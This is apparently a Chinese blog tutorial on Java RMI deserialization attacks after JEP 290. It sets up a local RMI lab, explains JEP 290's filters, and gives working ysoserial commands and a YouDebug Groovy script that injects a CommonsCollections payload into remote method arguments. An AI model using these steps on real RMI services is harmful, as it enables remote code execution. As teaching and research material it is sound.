JEP 290之后攻击Java RMI服务

最新推荐文章于 2023-02-06 09:47:36 发布
最新推荐文章于 2023-02-06 09:47:36 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qsort_/article/details/104814905
版权

1 RMI基础

1.1 概述

        远程方法调用是分布式编程中的一个基本思想。实现远程方法调用的技术有很多,例如WebService,两者的区别就是:WebService是独立于编程语言的,它可以跨语言实现项目间的方法调用,而Java RMI是专用于Java环境的。

        远程服务器实现具体的Java方法并提供接口,客户端本地仅需根据接口类的定义,提供相应的参数即可调用远程方法并获取执行结果。Java在底层实现了远程调用过程中具体的网络通信细节,开发者不需要关心这部分,因此在调用分布在不同的JVM中的对象时就像调用本地对象一样。

1.2 搭建简易RMI服务

1、服务端提供一个HelloService服务,如下为该服务的接口:

public interface IHelloService extends java.rmi.Remote {
    //远程调用方法必须抛出RemoteException异常
    String sayHello(Object obj) throws RemoteException;
    void log(String msg) throws RemoteException;
}

2、HelloServiceImpl实现上述接口:

public class HelloServiceImpl implements IHelloService {
    @Override
    public String sayHello(Object obj) {
        System.out.println("sayHello被调用,obj值为: " + obj);
        return "我是RMIServer ...... ";
}
    @Override
    public void log(String msg) throws RemoteException {
        System.out.println("msg: " + msg);
    }
}

3、为了能远程调用该服务对象,JDK提供了一个RMI注册表(RMIRegistry)。只需要将对象注册到Registry即可,Registry默认监听在传说中的1099端口上。

public class RMIServer {
    public static void main(String[] args) {
        try {
            HelloServiceImpl obj = new HelloServiceImpl();
            //HelloServiceImpl没有继承UnicastRemoteObject,需使用exportObject来处理
            IHelloService helloService = (IHelloService) UnicastRemoteObject.exportObject(obj, 0);
            //创建Registry,监听于9999端口
            Registry reg = LocateRegistry.createRegistry(9999);
            //将HelloServiceImpl绑定到Registry
            reg.bind("HelloService", helloService);
            System.out.println("HelloServiceImpl已绑定到Registry ......");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

4、建立客户端,调用上述提供的RMI服务:

public class RMIClient {
    public static void main(String[] args) throws Exception {
        //根据ip和端口获取Registry
        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 9999);
        //使用Registry获取远程对象的引用
        IHelloService services = (IHelloService) registry.lookup("HelloService");
        // 使用远程对象的引用调用对应的方法
        String res = services.sayHello("我是RMIClient ...... ");
        System.out.println(res);
    }
}

5、运行结果:

1)首先启动RMIServer,结果如下:

RMIServer运行结果

 

2、再启动RMIClient,可以看到控制台输出了服务端方法的返回值:

RMIClient运行结果

3、这时服务端控制台也打印了调用方法时传递的参数值:

2 JEP290

2.1 未引入JEP290之前攻击RMI服务

1、我们仍然使用上述的RMIServer代码作为服务端,但jdk版本使用较低的jdk1.8.0_112,如下:

jdk1.8.0_112运行RMIServer

 

2、使用ysoserial提供的exp来进行攻击,我使用的命令如下:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 9999 CommonsCollections7 "calc"

解释如下:

1)使用ysoserial的ysoserial.exploit.RMIRegistryExploit类攻击127.0.0.1上的9999端口提供的RMI服务,

2)使用的payload为CommonsCollections7,因为服务端存在commons-collections-3.1.jar工具包,

3)执行的命令是calc

3、可以看到虽然有报错,但成功弹出了计算器:

jdk1.8.0_112成功攻击RMI服务

2.2 引入JEP290之后攻击RMI服务

1、将RMIServer端的jdk版本设置为jdk1.8.0_152,如下:

jdk1.8.0_152运行RMIServer

 

2、同样使用上述ysoserial的命令,这时客户端与服务端均有错误,都可以看到一个filter status:REJECTED,这就是JEP 290起的防护作用:

jdk1.8.0_152攻击RMI服务失败

 

2.3 JEP 290是如何防护的

       虽然引入JEP290之前,已有相应的缓解反序列化漏洞的方案,例如重写ObjectInputSteam的resolveClass()方法,但仍然缺少处理此问题的官方规范,因此在JDK9中引入了JEP 290,使用反序列化过滤器来提高数据反序列化的安全性,并且它也反向移植到了老版本的JDK(JDK 8u121、JDK 7u131和JDK 6u141)中。配置过滤器的方法有一下三种:

2.3.1自定义过滤器

通过实现ObjectInputFilter接口可以创建自定义过滤器,需重写checkInput(FilterInfo filterInfo)方法如下,该过滤器只允许反序列化String类型的对象,其余类型对象都会REJECTED:

class MyFilter implements ObjectInputFilter {
    final Class<?> clazz = String.class;
    public ObjectInputFilter.Status checkInput(FilterInfo filterInfo) {
        if (filterInfo.serialClass() != null && filterInfo.serialClass() == this.clazz) {
            return Status.ALLOWED;
        } else {
            return Status.REJECTED;
        }
    }
}

在JDK9中可以使用ObjectInputStream.setObjectInputFilter(ObjectInputFilter filter)方法设置自定义过滤器;

老版本中可以使用ObjectInputFilter.Config.setObjectInputFilter(ois,new VehicleFilter())方法。

2.3.2全局过滤器

通过系统属性或配置文件配置全局过滤器:

系统属性:jdk.serialFilter(通过命令行参数“-Djdk.serialFilter=”来设置)

配置文件:jdk.serialFilter(位于%JAVA_HOME%/conf/security/java.properties)

如下为我在jdk1.8.0_152中测试时添加的全局过滤器,该设置不允许反序列化org.apache.commons.collections包下包括所有子包中的所有类:

全局过滤器测试

 

2.3.3内置过滤器

用于RMI注册表和分布式垃圾收集(DGC),这两个内置过滤器均采用白名单方式,仅允许对特定类进行反序列化:

RMIRegistryImpl

java.lang.Number
java.rmi.Remote
java.lang.reflect.Proxy
sun.rmi.server.UnicastRef
sun.rmi.server.RMIClientSocketFactory
sun.rmi.server.RMIServerSocketFactory
java.rmi.activation.ActivationID
java.rmi.server.UID

DGCImpl

java.rmi.server.ObjID
java.rmi.server.UID
java.rmi.dgc.VMID
java.rmi.dgc.Lease

3 攻击

尽管不再可能在RMI注册表或DGC上利用Java反序列化执行代码,但只要未设置全局过滤器,还是可以利用的,原因如下:

当RMI客户端调用远程对象时,服务端将在sun.rmi.server.UnicastServerRef类中有如下调用链来校验远程调用发送的参数值:

dispatch()->unmarshalParameters()->unmarshalParametersUnchecked()->unmarshalValue();

unmarshalValue方法如下:

protected static Object unmarshalValue(Class<?> var0, ObjectInput var1) {
        if (var0.isPrimitive()) {
            if (var0 == Integer.TYPE) {
                return var1.readInt();
            } else if (var0 == Boolean.TYPE) {
                return var1.readBoolean();
            } else if (var0 == Byte.TYPE) {
                return var1.readByte();
            } else if (var0 == Character.TYPE) {
                return var1.readChar();
            } else if (var0 == Short.TYPE) {
                return var1.readShort();
            } else if (var0 == Long.TYPE) {
                return var1.readLong();
            } else if (var0 == Float.TYPE) {
                return var1.readFloat();
            } else if (var0 == Double.TYPE) {
                return var1.readDouble();
            } else {
                throw new Error("Unrecognized primitive type: " + var0);
            }
        } else {
            return var1.readObject();
        }
    }

从上述方法中可以看到,如果传入的类型不为基本类型,将直接调用readObject()方法来对其进行反序列化,此过程并未经过RMI的内置过滤器,因此可以通过远程调用方法时传入恶意对象来达到反序列化任意对象的目的

攻击情形可分为以下两类:

3.1远程方法存在Object类型的参数

此种情况利用很简单,我们可以借助ysoserial生成payload,然后直接将该payload作为参数调用即可。

在第二章中搭建的RMI服务中sayHello方法的参数类型就是Object类型,为了方便,我直接在ysoserial源码基础上做修改来攻击:

1、RMI服务端java版本为jdk1.8.0_152,如下:

jdk1.8.0_152启动RMIServer

2、修改ysoserial的RMIRegistryExploit类的exploit方法如下即可,当然还需要在ysoserial项目中将IhelloService接口复制过来:

修改ysoserial的exp

配置参数如下,与第二章在命令行中设置的参数一样:

配置参数

3、运行main函数即可,可以看到成功弹出计算器:

远程方法存在Object类型的参数攻击成功

3.2 远程方法不存在Object类型参数

这种情况利用就相对复杂些,但事实上,这种情况出现的几率比第一种情况大了很多,因为大多数接口是不提供接受任意类型对象作为参数的方法的,这时就需要动态替换rmi调用过程中传递的参数值:

1、同样先启动RMI服务:

jdk1.8.0_152启动RMIServer

2、将IHelloService.java与RMIClient.java两个文件拷贝到test目录下,在该目录下执行javac -d . *.java命令,即可编译为class文件,并根据包名生成对应目录

3、以支持远程调试的方式启动RMIClient,因为要使用ysoserial生成payload,所以需要将其加入classpath,执行如下命令:

java -agentlib:jdwp=transport=dt_socket,server=y,address=127.0.0.1:8000 -cp ".;ysoserial-0.0.6-SNAPSHOT-all.jar" hldf.rmitest.RMIClient

4、利用YouDebug调试器来动态修改参数,YouDebug是一个支持Groovy脚本调试器,可以在java.rmi.server.RemoteObjectInvocationHandler类的invokeRemoteMethod方法中设置断点来修改传递的参数值,如下Groovy脚本即可完成该操作:

// 使用的ysoserial中的payload名称
def payloadName = "CommonsCollections6";
//执行的命令
def payloadCommand = "calc";
//替换的参数值
def needle = "hldf..."

println "Loaded..."

// set a breakpoint at "invokeRemoteMethod", search the passed argument for a String object
// that contains needle. If found, replace the object with the generated payload
vm.methodEntryBreakpoint("java.rmi.server.RemoteObjectInvocationHandler", "invokeRemoteMethod") {
  // make sure that the payload class is loaded by the classloader of the debugee
  vm.loadClass("ysoserial.payloads." + payloadName);
  println "[+] java.rmi.server.RemoteObjectInvocationHandler.invokeRemoteMethod() is called"

  // get the Array of Objects that were passed as Arguments
  delegate."@2".eachWithIndex { arg,idx ->
	  println "[+] Argument " + idx + ": " + arg[0].toString();
    if(arg[0].toString().contains(needle)) {
      println "[+] Needle " + needle + " found, replacing String with payload" 
      def payload = vm._new("ysoserial.payloads." + payloadName);
      def payloadObject = payload.getObject(payloadCommand)
	   
      vm.ref("java.lang.reflect.Array").set(delegate."@2",idx, payloadObject);
	    println "[+] Done.."	
	  }
  }
}

执行如下命令即可:

java -jar youdebug.jar -socket 127.0.0.1:8000 barmitzwa.groovy

5、可以看到成功弹出计算器:

远程方法不存在Object类型的参数攻击成功

4 总结

该攻击方式有以下缺点:

1、仅当攻击者有权访问RMI服务时,才能攻击成功,因为我们是通过调用远程方法的方式进行攻击的。

2、攻击者需知道RMI服务接口中方法的签名,因为没有方法签名当然是无法去调用远程方法的,可以通过枚举常见的方法签名来进行攻击,例如:

login(String username, String password)

logMessage(int logLevel, String message)

log(int logLevel, String message)

5 参考

https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/

hldfight
关注
专栏目录
一文回顾攻击Java RMI方式
zybb166的博客
01-10 753
前序 RMI存在着三个主体 RMI Registry RMI Client RMI Server 而对于这三个主体其实都可以攻击,当然了需要根据jdk版本以及环境寻找对应的利用方式。 Ps.在最初接触的RMI洞是拿着工具一把梭,因此在以前看来笔者以为RMI是一个服务,暴露出端口后就可以随意攻击,现在看来是我才疏学浅了,对于RMI的理解过于片面了。本文是笔者在学习RMI的各种攻击方式后的小结,若有错误,请指出。 Ps1.本文并无任何新知识点,仅仅是对于各位师傅文章的一个小总结。 RMI为何 关
Java安全之攻击RMI的思考
最新发布
why811的博客
08-11 357
这里,如果Java应用没有对传入的序列化数据进行安全性检查,我们可以将恶意的TransformedMap序列化后,远程提交给Java应用,如果Java应用可以触发变换,即可成功远程命令执行。结合前述Commons Collections的特性,如果某个可序列化的类重写了readObject()方法,并且在readObject()中对Map类型的变量进行了键值修改操作,并且这个Map变量是可控的,就可以实现我们的攻击目标了。例如,攻击者可以在反序列化数据中包含恶意类或利用已知的反序列化漏洞。
JEP-290:JEP-290的测试
03-28
JEP-290 JEP-290的测试 建造 要构建此项目,请运行以下命令(Mac或Unix): ./build 这将构建Java代码,然后构建2个docker映像: jep290 / java:使用裸Java 8 VM测试过滤。 jep290 / jboss:在运行于Java 8 VM之上的JBoss WildFly 14应用服务器中测试过滤。 跑步 该测试使用以下JDK串行过滤器进行配置:java.math。**;!* 这意味着只允许序列化java.math包中的类。 要运行简单的Java测试,只需执行以下操作: docker run jep290/java 您应该看到以下输出: Jan 1, 1970 0:00:00 AM sun.misc.ObjectInputFilter$Config lambda$static$0 INFO: Creating serializa
Java代码审计——RMI攻击方式纲要
王嘟嘟的博客
02-13 881
0x00 前言 反序列化总纲 在看了网上公开的文章,觉得自己分析的内容过于短浅,所以特重新针对RMI攻击方式进行整理和总结。这里按照使用或者攻击场景来进行学习和分析 0x01 探测发现 1. 场景 定向攻击RMI,但是还没有目标,此时就需要找到一个目标。 2.工具: https://github.com/NickstaDB/BaRMIe nmap 0x02 攻击server端 场景1 知道目标server绑定的类 确定目标绑定的类存在Object参数 攻击方式 通过直接将gadget传入的方式就可以
JEP290下的RMI实现及Bypass 8u231-8u240
ALLEN'Blog
02-06 297
这篇接着上一篇针对8u231利用利用不成功的后续进行分析,通过另外一种手法 Bypass 8u231的修复。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
JEP 290 初识
Armandhe的博客
05-10 481
JEP 290 初识
缓存驱动rmifilter status: REJECTED
pengdayong77的博客
01-06 2925
原因是rmi序列化漏洞,apach设置了过滤策略。在注入时限制了一些类序列化。在C:\Program Files\Java\jre1.8.0_161\lib\security\java.security【注意,你的文件目录可能不是这个目录】更改为sun.rmi.registry.registryFilter=*即可。 ...
remote-method-guesser:Java RMI漏洞扫描程序
05-01
检查已知漏洞(启用的类加载器,缺少JEP290JEP290旁路,本地主机旁路) 通过使用蛮力(单词列表)方法识别现有的远程方法 使用用户指定的参数调用远程方法(无需编码) 在参数内使用ysoserial小工具调用远程...
RMIDeserialize:RMI 反序列化环境 一步步
04-22
RMIDeserialize RMI反序列化学习环境,...java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地JRMP服务IP> <本地JRMP服务端口>:攻击目标8u231版本以下的RMI服务。 其他功能可以从源码运行。
漫谈 JEP 2901
08-03
JEP 290,全称为“Filter Incoming Serialization Data”,是一项针对Java平台的重要更新,旨在增强序列化过程的安全性。序列化是Java中一种常用的数据持久化手段,但同时也存在安全隐患,恶意用户可能利用不安全的...
java访问windows注册表 method native_code2sec.com/CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞.md at maste...
weixin_39927508的博客
12-22 1245
Title: CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞Date: 2020-08-04 10:20Category: 漏洞实践Tags: Java,RMI,漏洞,反序列化Slug:Authors: bit4wooSummary:CVE-2017-3241 Java RMI Registry.bind()反序列化漏洞如有错误,敬请斧正!漏洞简介简要说明...
JceKeyStore "ObjectInputFilter REJECTED" 问题分析与解决
helowken2的博客
08-24 1941
1. INFO: ObjectInputFilter REJECTED: class com.sun.crypto.provider.SealedObjectForKeyProtector 2. java.io.ObjectInputStream filterCheck 3. java.io.IOException: Invalid secret key format 4. PowerMock, JCES KeyStore, Java 8 JRE 172
Java面向对象系列[v1.0.0][输入流过滤器对反序列化对象有效性验证]
一块大洋
06-07 648
在程序做反序列化之前,可以对序列化数据进行检查,从而确保反序列化后的数据唯一,如此可以保证程序更健壮且安全
RMI Bypass Jep290(Jdk8u231) 反序列化漏洞分析
爱国小白帽
07-26 1516
360-CERT [三六零CERT](javascript:void(0)???? 前天 0x00 漏洞简述 随着RMI的进一步发展,RMI上的反序列化攻击手段正逐渐增多,该类漏洞最近正受到愈加广泛的关注。 RMI (Java Remote Method Invocation) 是Java远程方法调用,是一种允许一个 JVM 上的 object 调用另一个 JVM 上 object 方法的机制,在Java RMI 的通信过程中存在反序列化漏洞,攻击者能够利用该漏洞造成代码执行,漏洞等级:高危。 在JDK8
jep290涉及jdk版本_而针对的最新JDK 9 JEP是……
07-07 300
jep290涉及jdk版本 自去年宣布Java 9功能以来,有241个JEP和两个目标– JDK 9背后的团队一直很忙。 这是针对JDK 9的十个最新中小型项目的TL; DR 。 正确处理进口货单 ( JEP 216 ) 根据导入的顺序,当前的Javac有时会接受或拒绝相同的源代码。 业主扬·拉霍达(Jan Lahoda)说,这是“错误和令人困惑的事情”,他成功提出了纠正建议。 注释...
Java中接口(Interface)的定义和使用
热门推荐
薛建新的博客
09-17 7万+
Java中接口(Interface)的定义和使用有关Java中接口的使用相信程序员们都知道,但是你们知不知道接口到底有什么用呢?毫无疑问,接口的重要性远比想象中重要。接下来我们便一起来学习Java中接口使用.
JDK8-十大新特性-附demo
weinichendian的博客
07-05 3986
一、十大特性。1.Lambda表达式2.Stream函数式操作流元素集合3.接口新增:默认方法与静态方法4.方法引用,与Lambda表达式联合使用5.引入重复注解6.类型注解7.最新的Date/Time API (JSR 310)8.新增base64加解密API9.数组并行(parallel)操作10.JVM的PermGen空间被移除:取代它的是Metaspace(JEP 122)元空间 二、de...
深入解析JEP 290Java反序列化安全增强
"本文主要讨论JEP 290,即Java中的过滤传入序列化数据的机制,旨在提高安全性并控制反序列化过程。" JEPJava Enhancement Proposal)290Java平台的一个重要改进,其核心目标是增强Java反序列化过程的安全性。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值